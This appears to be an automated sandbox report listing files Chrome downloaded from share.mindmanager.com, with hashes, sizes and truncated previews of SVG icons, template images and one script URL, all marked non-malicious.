                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3229
                                                                Entropy (8bit):4.415667678416587
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2685DA60134645BB8217DBC3E7E7066E
                                                                SHA1:2839FF6A5701F7845B2D1C658EE957F5A33F0E74
                                                                SHA-256:334C6359ADE5461DBB987951C81F35740EBB02124F136FB69921C2DA2BEE4A83
                                                                SHA-512:0E08B0C0A179A5688E47CA82628FA8EF564AF5C8496F347D8AD51DC4062406CDDFCC3DE53B88FEDFDAC9C0B9004185C8FA508884A18D5726EB3DF12193B2D136
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-attachments-toggle-active.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 18"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#3e9eff;}.cls-3{fill:gray;}</style></defs><title>control_strip_Attachment_active</title><rect class="cls-1" x="0.5" y="0.5" width="17" height="17" rx="2.44"/><path class="cls-2" d="M15.06,1A1.94,1.94,0,0,1,17,2.94V15.06A1.94,1.94,0,0,1,15.06,17H2.94A1.94,1.94,0,0,1,1,15.06V2.94A1.94,1.94,0,0,1,2.94,1H15.06m0-1H2.94A2.94,2.94,0,0,0,0,2.94V15.06A2.94,2.94,0,0,0,2.94,18H15.06A2.94,2.94,0,0,0,18,15.06V2.94A2.94,2.94,0,0,0,15.06,0Z"/><path class="cls-3" d="M7.53,16.48a4.83,4.83,0,0,1-4.87-5.12A5.32,5.32,0,0,1,4.32,7.77L8,4.31,9.15,5.5,5.45,9a3.48,3.48,0,0,0-.29,4.9,3.2,3.2,0,0,0,2.35,1h0a3.69,3.69,0,0,0,2.55-1l3.7-3.46,1.13,1.19L11.19,15A5.31,5.31,0,0,1,7.53,16.48Z"/><path class="cls-1" d="M8,5l.44.47L5.11,8.6a4,4,0,0,0-.31,5.6,3.7,3.7,0,0,0,2.71,1.15,4.24,4.24,0,0,0,2.9-1.18l3.33-3.12.44.47-3.33,3.11A4.82,4.82,0,0,1,7.53,16a4.36,4.36,0,0,1-3.19-1.35,4.61,4
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1115
                                                                Entropy (8bit):4.716638283840663
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0BEB65566A3D83A31F565583A342025F
                                                                SHA1:DDE686F56A091CB2BBE298EC2926AF5D9835B659
                                                                SHA-256:A27372F239ECBE3A86004F629F3CA1D014751D4FE2E995D321DA75719FB27CC9
                                                                SHA-512:2821FB2FC26D59C54CA6914B62BBA85F029DA4CE60926FD992B4572940C673EF34B42EB6FC411FA7FC4453C219F948D4F267700609B843D5400961815A5107A1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority05.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9e55ff;}.cls-2{fill:#8430f0;}.cls-3{fill:#fff;}</style></defs><title>priority05</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M4.85,11.85,6,10a2.91,2.91,0,0,0,2,.9,1.54,1.54,0,0,0,1-.33,1.09,1.09,0,0,0,.43-.9A1.06,1.06,0,0,0,9,8.72a1.83,1.83,0,0,0-1.15-.34,2.9,2.9,0,0,0-1.34.34l-1.3-.49L5.62,3H11V5H7.75L7.69,6h0a1.63,1.63,0,0,0,.72.31A3.61,3.61,0,0,1,11,7.24,3.21,3.21,0,0,1,12,9.6a3.43,3.43,0,0,1-1,2.56,3.68,3.68,0,0,1-2.67,1A4.74,4.74,0,0,1,4.85,11.85Z"/><path class="cls-3" d="M3.85,10.85,5,9a2.91,2.91,0,0,0,2,.9,1.54,1.54,0,0,0,1-.33,1.09,1.09,0,0,0,.43-.9A1.06,1.06,0,0,0,8,7.72a1.83,1.83,0,0,0-1.15-.34,2.9,2.9,0,0,0-1.34.34l-1.3-.49L4.62,2H10V4H6.75L6.69,5h0a1.63,1.63,0,0,0,.72.31A3.61,3.61,0,0,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):59612
                                                                Entropy (8bit):4.1945509293651595
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E2429014EB9615E63084FFAF6C274C85
                                                                SHA1:FEDF7FE7CF47AA7351BA69041D98E611B8EC1865
                                                                SHA-256:EE00BA23174121F9C490E09D454D2BBF74BD48FD741D20920EEB58A87E6FDF3F
                                                                SHA-512:5DE70F61D80FF7222D09069FF9D666399B0CBBFFF1A98367678FBFD257E5896EA9133EA76783C2A99902EADAE3B41B87AB7865F524D7C6C984D6B26A7846EBF7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_salesmanagement.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_8528)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#CCEBEA"/>..<g clip-path="url(#clip1_456_8528)">..<path d="M613.875 100.281C605.951 79.2949 588.841 61.6899 568.227 49.5998C541.341 33.8309 506.886 27.0869 476.397 36.051C445.909 45.0151 421.329 71.4135 421.616 100.323C421.753 114.216 428.447 129.019 442.143 135.397C455.343 141.543 471.944 138.733 485.255 144.683C509.104 155.343 513.478 186.964 542.012 192.403C564.653 196.718 594.172 180.332 606.161 164.1C619.786 145.65 621.798 121.266 613.875 100.281Z" fill="#9BDDDB"/>..<path d="M469.856 154.335C460.244 149.048 428.754 146.24 433.907 167.791C436.435 178.366 453.179 173.389 456.399 182.69C460.724 195.185 479.28 196.553 482.495 181.694C484.009 174.70
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):487
                                                                Entropy (8bit):5.020288501193502
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7658338CFC1A7F8F6740219E829204E5
                                                                SHA1:7239D3933814B3A716E4ADE973F8AE94BB49D854
                                                                SHA-256:987A42A74F7E6856405DF2C7FADEE676427B8D9A86B8DE1C86079B62665EFB43
                                                                SHA-512:1D782EA1662A97FA2AEE846D8A1F7F94FF8A9D7AF45C01DBBF914D4AEBD20AABE3E0B6BC24D72082350B636131E76879FE646F2D1C5B6F192848ABB3E65C92A6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/flag-yellow.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{opacity:0.2;}</style></defs><title>flag_yellow_16 copy</title><rect class="cls-1" x="1" width="1" height="16" rx="0.5" ry="0.5"/><polygon class="cls-1" points="8 11 8 4.5 16 7.75 8 11"/><polygon class="cls-1" points="8 8.5 2 10 2 1 8 2.5 8 8.5"/><rect class="cls-2" x="7" y="3" width="1" height="6"/><rect width="1" height="16" rx="0.5" ry="0.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):409
                                                                Entropy (8bit):5.285433339814641
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9696CF52A6EDABA4CA2397BEBD56D7D0
                                                                SHA1:08845707AC84C7C008B3DE470EA76A90E2E8B439
                                                                SHA-256:F42A1CAD72CED0D3F44CE2132C892D43AAF6F3314974C30E6E24D01BCDA2A22E
                                                                SHA-512:DE3DA27ECEAB83B2CE40B8EDFA7770244F067ECD81FAA1AAA8B50F63E714A41B21D92C2438D11D31C7D197D4C9B8DABD27B96688BC8378C535DD17FC58632239
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/resource-1.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}.cls-2{fill:#fff;}</style></defs><title>user_blue_16</title><circle class="cls-1" cx="8" cy="8" r="8"/><circle class="cls-2" cx="8" cy="5" r="3"/><path class="cls-2" d="M9,8H7C5.54,8,3,9.24,3,10.75v2.88A9.43,9.43,0,0,0,8,15a9.43,9.43,0,0,0,5-1.37V10.75C13,9.24,10.46,8,9,8Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):503
                                                                Entropy (8bit):5.201132046464968
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8DD31AB647019FA0712693F489A22561
                                                                SHA1:79834210E30D4189AC55AD29AF9662BA124DCFB9
                                                                SHA-256:53F537F61DF8109F2A51F44264A1DBD47E2049B036E8DA630DC586ECC986A2DF
                                                                SHA-512:60440623047763E599CE4D9BDB83823F7AF118984A902CF304C0CD6AC2A7422D85D7DD73880F6935C69ED2A72E5659EE2E888B8255F5D79BC6CA9D74085100C5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/back-button.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 41 41"><defs><style>.cls-1{fill:#fff;stroke:#3a52a4;stroke-miterlimit:10;}.cls-2{fill:#3a52a4;}</style></defs><title>back button</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1">. <path class="cls-2" d="M24.25,29.48a.56.56,0,0,1-.19,0,.49.49,0,0,1-.17-.11l-9-9a.51.51,0,0,1,0-.71l9-9a.51.51,0,0,1,.71,0,.5.5,0,0,1,0,.7L15.95,20l8.65,8.64a.5.5,0,0,1,0,.7.49.49,0,0,1-.17.11A.53.53,0,0,1,24.25,29.48Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3647
                                                                Entropy (8bit):4.809044033673105
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9565C2E7171D669435D1B5D45D1F9230
                                                                SHA1:BA599A9683F64FCF88D305BDFBEC45D006FEE1AF
                                                                SHA-256:57BB1F1D56CD71C4FD3B8CF9D488079759643F1A7CE4BFCC82FA290BA56CC4ED
                                                                SHA-512:0EDF79AE7CE2A81F925F47DF77F530C7F8A18BB89CEA0F5DBC8066B2D06650F693DB22D7AC73960F04130F09FE62E5370F9062D1B262D57118B62AA986E9F10C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/businessmodelcanvas.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="45.9932" y="2" width="24.6459" height="31.7281" rx="2" fill="#F7D991"/>.<rect x="99.9805" y="2" width="24.6459" height="31.7281" rx="2" fill="#A4C6E7"/>.<rect x="45.9932" y="35.9922" width="24.6459" height="31.7281" rx="2" fill="#C48E2C"/>.<rect x="99.9805" y="35.9922" width="24.6459" height="31.7281" rx="2" fill="#CADBE8"/>.<rect x="19" y="2" width="24.6459" height="65.7225" rx="2" fill="#F0B326"/>.<rect x="72.9883" y="2" width="24.6459" height="65.7225" rx="2" fill="#69B5B3"/>.<rect x="126.975" y="2" width="24.6459" height="65.7225" rx="2" fill="#518ECF"/>.<rect x="19" y="69.752" width="65.0091" height="18.2503" rx="2" fill="#94A9BA"/>.<rect x="86.6064" y="69.752" width="65.0091" height="18.2503" rx="2" fill="#284868"/>.<rect x="47.877" y="10.5527" width="10.4723" height="10.4723" fill="white" fill-opacity="0.2"/>.<rect x="57.5029" y="15.9004" width="10.4723" height="10.4723" fi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1828
                                                                Entropy (8bit):4.548485397335114
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F224F1DE0E52FD0A09EC1272F2EC258E
                                                                SHA1:10D6487EE45651FA96DA8D16C668A8CA03607645
                                                                SHA-256:612DBFF2479E6FBD855657206A1D7D1C742D9A70907E2C21A39162114BDAFE8A
                                                                SHA-512:F16BDC7791F5109B465C895694B342A8DDF20525ECF7A677AA291275E6AE0AD10E528E2F97EBD4CC3A555EE011FC77C9DC378D55F8D81D79275DCDEB33D20D2E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority06.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#727272;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority06</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5,8.67a6.57,6.57,0,0,1,.32-2,6.46,6.46,0,0,1,.89-1.78A4.32,4.32,0,0,1,7.69,3.59a4.39,4.39,0,0,1,2.05-.48A5.09,5.09,0,0,1,12,3.54l-.66,2.1a2.78,2.78,0,0,0-.61-.19,3.31,3.31,0,0,0-.76-.1A2.14,2.14,0,0,0,7.76,7h0a2.28,2.28,0,0,1,.6-.24,3.24,3.24,0,0,1,.77-.11,3,3,0,0,1,2.68,1.42,3.73,3.73,0,0,1,.6,2,3.37,3.37,0,0,1-.93,2.36,3.23,3.23,0,0,1-2.49,1,3.82,3.82,0,0,1-2.85-1.24A4.86,4.86,0,0,1,5,8.67ZM9,10.93a.92.92,0,0,0,.73-.33A1.16,1.16,0,0,0,10,9.81a1.5,1.5,0,0,0-.38-1,1.41,1.41,0,0,0-1.13-.43c-.69,0-1,.2-1,.6A2.12,2.12,0,0,0,8,10.35,1.39,1.39,0,0,0,9,10.93Z"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):404
                                                                Entropy (8bit):5.115686965164662
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BB49623B80FF949681C3F7283F103587
                                                                SHA1:52B5675C9DD6A5CD0CC23A8BE787B6375BCAFD34
                                                                SHA-256:A6BC6AD71C1752798B6B6A3457A5CBBCF8810978E3CDC3EF1105675F4D947764
                                                                SHA-512:1CAABFE9551732EC896B8AD6C7106E7188134DD7F3AB54CD9A939A4496B27A88D623EAEF578167D2120727E753C8EBDEC4C5F75363E5223AC8E98696859B1003
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/two-end-arrow.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}</style></defs><title>arrow_2_16</title><polygon class="cls-1" points="0 7.83 5 12.14 5 3.52 0 7.83"/><polygon class="cls-1" points="16 7.83 11 12.14 11 3.52 16 7.83"/><rect class="cls-1" x="6.5" y="2.5" width="4" height="11" transform="translate(0.5 16.5) rotate(-90)"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):34163
                                                                Entropy (8bit):4.28549388471425
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:986DE2B7198646321B0980D8E375DF62
                                                                SHA1:F4FFC40C82421A062BC58EA51D611A2B9B2A69A1
                                                                SHA-256:DEECDCC2E1FB5486B74754F703241685BC74A9366EC6DC32896FC6C598A7A162
                                                                SHA-512:4388FA783583B2E81A8F63D3816F6179A9262B01E841FC0486073845C095CA69ACD23226D59C9F9BD622F197791496A6DF6DC198A6AB4B0C7A6C2E260A061B60
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_flowcharts.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="200" height="250" rx="10" fill="#FFDAC3"/>..<g clip-path="url(#clip0_456_5480)">..<path d="M186.388 183.836C193.843 164.859 189.961 143.457 178.328 127.26C166.695 111.063 147.953 99.8824 127.47 94.2436C100.755 86.889 69.6161 89.0257 45.4983 103.738C21.3805 118.451 6.34793 146.774 13.2455 171.533C16.5604 183.431 25.7144 194.602 38.9424 196.928C51.6912 199.169 65.2998 192.936 78.0993 194.982C101.031 198.649 112.063 224.795 137.815 222.9C158.25 221.395 179.828 200.533 186.388 183.836Z" fill="#F6C2A2"/>..<path d="M170.945 63.8008H32.6553C26.5497 63.8008 21.6001 68.137 21.6001 73.486V160.016C21.6001 165.365 26.5497 169.701 32.6553 169.701H170.945C177.051 169.701 182 165.365 182 160.016V73.486C182 68.137 177.051 63.8008 170.945 63.8008Z" fill="#F8FBFF"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M32.6555 64.5356C26.8613 64.5356 22.3349 68.6312 22.3349 73.4862V160.016C22.3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):33107
                                                                Entropy (8bit):4.047349744983345
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:41D2609AFC6194711168489DF3104AA8
                                                                SHA1:EBEB325656D70DAE623AF2A6FCC3B71945D4B37C
                                                                SHA-256:B379B42106B7E8A6218BCE55BB731910F56D5CAE8BDAF0BA303D5D8C972A570E
                                                                SHA-512:440379A6DBFC5AA5A8285E9BFDF883CEA41C59050E9C96D3C6C22628E008549E9DBF59AFD95F7C93ACEC599D18339FCCE3E11803AF0E8843A4B437A3DA3E2785
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_brainstorming_ideation.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_5364)">..<rect width="200" height="250" rx="10" fill="#FFF3DC"/>..<path opacity="0.5" fill-rule="evenodd" clip-rule="evenodd" d="M169.029 274.701C162.742 296.099 152.091 317.466 131.505 326.046C111.233 334.495 88.8201 326.871 69.6748 316.111C51.2735 305.77 89.7002 277.197 52.0002 277.197C4.45017 265.097 0.715661 195.676 31.7994 177.383C62.3502 159.403 85.3277 198.152 107.95 199.047C130.475 199.938 146.45 190.144 165.993 208.678C190 231.447 156.35 263.997 169.029 274.701Z" fill="#F8D79B"/>..<path d="M123.7 172.998C126.627 172.998 129 171.185 129 168.948C129 166.712 126.627 164.898 123.7 164.898C120.773 164.898 118.4 166.712 118.4 168.948C118.4 171.185 120.773 172.998 123.7 172.998Z" fill="#B1CCFB"/>..<path d="M118.45 179.398C119.803 179.398 120.9 178.547 120.9 177.498C120.9 176.448 119.803 175.598 118.45 175.598C117.097 175.598 116 176.448 116 177.498C116 178
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):695
                                                                Entropy (8bit):5.126280809820028
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:207B5B4BDAA8A7D1E72C86C8E15A4185
                                                                SHA1:33AA6FB297978AC9435CFF2F86557A43F7D6DD4E
                                                                SHA-256:826FBE68A571FB24D8C429B75462EE4EC68AFD42D0A375D295C1D84685C82CEA
                                                                SHA-512:F5DDC4DD2EAE31DF384EE61D5367726DCB1445B061ECC411F1561FD5AE842EB32D1B91F98F110BF1FDE255E090A2B289920E1A7A2B5B9D484A9BE9B088B5CE64
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_shape.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#7db7ea;}.cls-4{fill:#4f8ed4;}</style></defs><title>ribbon-Asset 63</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="20" height="14" rx="1.5"/><path class="cls-2" d="M19,1a1,1,0,0,1,1,1V13a1,1,0,0,1-1,1H2a1,1,0,0,1-1-1V2A1,1,0,0,1,2,1H19m0-1H2A2,2,0,0,0,0,2V13a2,2,0,0,0,2,2H19a2,2,0,0,0,2-2V2a2,2,0,0,0-2-2Z"/><circle class="cls-3" cx="15.5" cy="15.5" r="8"/><path class="cls-4" d="M15.5,8A7.5,7.5,0,1,1,8,15.5,7.5,7.5,0,0,1,15.5,8m0-1A8.5,8.5,0,1,0,24,15.5,8.51,8.51,0,0,0,15.5,7Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):672
                                                                Entropy (8bit):4.956319867307284
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5C1ABEE30C6B3143CD9ACF588EA3644C
                                                                SHA1:A37FE1B3DC45E872068A9CAAEE841D3D62ED8329
                                                                SHA-256:BB04ED15458E91C20C4FE84D8F755B67D3A852465B0346CCDCA56F660B0BCF72
                                                                SHA-512:91A17D0CD86465CC6660181DDA88F6AC12C35B80B2158E1F3553EC133208E3B8A5EC19A6E7693AF82AF53CA7E1C9527CC5ED421FA770DED1513E2462C695E9EB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/organizationalchart.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="57" y="22" width="57" height="20" rx="2" fill="#FDE02F"/>.<rect x="14" y="58.9141" width="36.1016" height="13.2373" rx="6.61863" fill="#28759F"/>.<rect x="66.9492" y="58.9141" width="36.1016" height="13.2373" rx="6.61863" fill="#28759F"/>.<rect x="119.898" y="58.9141" width="36.1016" height="13.2373" rx="6.61863" fill="#28759F"/>.<path d="M84.999 42.0664L84.999 58.9138" stroke="#28759F"/>.<path d="M32.0498 63.7283V51.8809C32.0498 49.1194 34.2884 46.8809 37.0498 46.8809H132.948C135.709 46.8809 137.948 49.1194 137.948 51.8809V63.7283" stroke="#28759F"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:downloaded
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://z5eq.081zq.com/46037766720872632233eUCzDGcGGUQRRTAYPVBZEPCICKRWWYYULZZUSADCRTXJFECRMWTQQPZQMGBZMC
                                                                Preview:0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):150
                                                                Entropy (8bit):5.068813987911036
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:993AFAF7A929F204DD150AF51FB5C6E1
                                                                SHA1:59666F717ECFF8D3A445FDD570B3C6FB8FB5C789
                                                                SHA-256:F4F7622F36C3E101123B7496A0074E765B8888A514742C66E0BFEEE3B176F047
                                                                SHA-512:774DC5FB4175DB8F977E5A413E223EAC8CF894E1AA57D2DFE6B88094C117941D5ABBDC4B4B8068C2BE4FB573BB455665E4B42D08C664568743D428E6E98F95E9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/text-format-italic-new.svg
                                                                Preview:<svg viewBox="0 0 40 50" xmlns="http://www.w3.org/2000/svg">.<path d="M17.5679 35L21.2079 16.688H24.2319L20.5919 35H17.5679Z" fill="#000B36"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 25 x 13, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):189
                                                                Entropy (8bit):5.9875147975813885
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5D982E07DDB32420B2A10BBEB6A6C316
                                                                SHA1:3396C8607F4FAA699BEE378D5BADC09508C98369
                                                                SHA-256:484CF520D1E7FF398678221249366EBECEDA923E9205F82C1BFCE3A30B2CE73C
                                                                SHA-512:33327A8B703B59597F089404BB92B2D15AA04E644CA92BD40C133ED4F355771EB8EA4F6C3F1A5A36696866A928D13E6724AC066E9C845DA99100DF890687874E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-shape-none.png
                                                                Preview:.PNG........IHDR.............\.......pHYs.................tEXtSoftware.Adobe ImageReadyq.e<...JIDATx.b<s.....~..F&.:..c.....G.kpY.r..Y. =..v,`...@lOCK...8...@.HC;..........]....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1224
                                                                Entropy (8bit):5.2926159493827445
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4BEA08F3F12357AF3F98674E0DE674A6
                                                                SHA1:284990FC7F4285422B244BD46B75E99502E39E1E
                                                                SHA-256:D6D269FA5C12EDFF7C7097B90CB4C708A8A7BAEB823A0759183A9166532BE98E
                                                                SHA-512:9B26DF432B1A1967C78F457DE27B9205FD36CC7B208A7AAD6BBC1B878A9312065FAE92177CE50D74C8345E64C0590F4A8FCC6CE1E019E974203609E5BD759DAF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_notes.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#c8c8c8;}.cls-3{fill:#528cc9;}.cls-4{fill:#edc26e;stroke:#b4853a;stroke-linecap:square;stroke-linejoin:round;}.cls-5{fill:#80b6e2;stroke:#528cc9;stroke-miterlimit:10;}.cls-6{fill:gray;}</style></defs><title>topic_info_icon_notes</title><polygon class="cls-1" points="8 13 12 9 12 5 8 1 1 1 1 15 8 15 8 13"/><rect class="cls-2" x="2" y="8" width="7" height="1" rx="0.29"/><rect class="cls-2" x="2" y="10" width="5" height="1" rx="0.29"/><rect class="cls-3" x="2" y="4" width="5" height="1" rx="0.29"/><rect class="cls-3" x="2" y="6" width="4" height="1" rx="0.29"/><path class="cls-4" d="M13.8,9.45h1a0,0,0,0,1,0,0V11a.5.5,0,0,1-.5.5h0a.5.5,0,0,1-.5-.5V9.45a0,0,0,0,1,0,0Z" transform="translate(17.02 27.95) rotate(-135)"/><path class="cls-5" d="M11.32,10.43h1a0,0,0,0,1,0,0v4.5a.5.5,0,0,1-.5.5h0a.5.5,0,0,1-.5-.5v-4.5a0,0,0,0,1,0,0Z" transform="translate(12.6 -4.5
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (7179)
                                                                Category:downloaded
                                                                Size (bytes):7180
                                                                Entropy (8bit):5.161749091368312
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8E28DB3A65522AE2012DE9ADCE4DE5BF
                                                                SHA1:84EA63544DA64A2355256B0BAE973AE1EAE04CE6
                                                                SHA-256:ADF7F9B0DD938575C72FF1592EA18E7AB9BC53FF8838A38C8484C10F5D9BE7FD
                                                                SHA-512:4319C5B3C4B880ADE6E25B28609A14152389CC8D835AD213D58984153C3E7FF8718B2829A330A7EA4F2C11DB68C358438563FB301D9D6240BF833CEE1462756C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://unpkg.com/web-vitals@4.2.1/dist/web-vitals.iife.js
